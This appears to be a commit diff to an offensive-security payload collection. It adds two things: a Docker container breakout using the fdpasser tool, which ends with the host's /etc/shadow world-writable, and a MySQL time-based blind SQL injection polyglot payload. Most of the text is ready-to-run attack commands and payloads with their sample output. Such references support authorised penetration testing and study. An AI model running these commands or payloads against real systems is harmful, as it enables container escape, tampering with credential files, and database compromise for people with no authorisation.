Docker device file breakout

Methodology and Resources/Container - Docker Pentest.md

@@ -10,6 +10,7 @@
 - [Insecure Docker Registry](#insecure-docker-registry)
 - [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
 - [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
+- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file)
 - [References](#references)
 
 ## Tools
@@ -164,6 +165,16 @@ $ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicio
 $ docker run --rm cve-2019-5736:malicious_image_POC
 ```
 
+## Breaking out of containers using a device file
+
+```powershell
+https://github.com/FSecureLABS/fdpasser
+In container, as root: ./fdpasser recv /moo /etc/shadow
+Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo
+Outside container: ls -la /etc/shadow
+Output: -rwsrwsrwx 1 root shadow 1209 Oct 10  2019 /etc/shadow
+```
+
 ## References
 
 - [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/)

SQL Injection/README.md

@@ -387,6 +387,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
 
 ```sql
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
+
+/* MySQL only */
+IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
 ```
 
 ## Routed injection